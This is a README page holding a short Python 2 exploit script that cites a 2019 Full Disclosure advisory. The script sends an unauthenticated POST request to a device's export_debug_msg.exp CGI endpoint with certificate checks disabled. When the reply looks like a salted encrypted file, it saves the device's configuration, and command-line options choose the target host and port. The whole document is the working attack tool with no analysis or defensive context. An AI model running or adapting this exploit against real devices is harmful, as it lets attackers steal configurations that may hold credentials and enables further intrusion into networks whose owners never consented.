README.md
Rendering markdown...
#!/usr/bin/python
# coding: utf-8
# ref: https://seclists.org/fulldisclosure/2019/Jan/53
import argparse
import requests
import sys
# nuke https warnings...
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def get_config(host="127.0.0.1", port="443", ssl=True, output_directory="output"):
outfile = "%s/%s_%s.enc" %(output_directory, host, port)
if ssl == True:
url = "https://%s:%s/cgi-bin/export_debug_msg.exp" %(host, port)
else:
url = "http://%s:%s/cgi-bin/export_debug_msg.exp" %(host, port)
try:
print "{+} Sending request to %s" %(url)
r = requests.post(url, data={"submitdebugmsg": "1"}, verify=False, stream=True)
except Exception, e:
sys.exit("{!} Exception while sending request, printing...\n%s" %(str(e)))
if "Salted__" in r.text:
print "{*} We seem to have found a valid encrypted config! Writing to %s" %(outfile)
try: # XXX: this is a hack... I had some dumb unicode errors going on...
with open(outfile, "wb") as f:
for chunk in r.iter_content(1024):
f.write(chunk)
except Exception, e:
sys.exit("{!} Exception hit while writing data, printing...\n%s" %(str(e)))
else:
sys.exit("{-} Doesn't seem to be what we are looking for, quitting!")
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', help="Target host", required=True)
parser.add_argument('-d', '--directory', default="output", help="Output directory...")
parser.add_argument('-s', '--ssl', action="store_true", default=True, help="Use SSL")
parser.add_argument('-p', '--port', default="443", help="Target port")
args = parser.parse_args()
get_config(host=args.target, port=args.port, ssl=args.ssl, output_directory=args.directory)
if __name__ == "__main__":
main()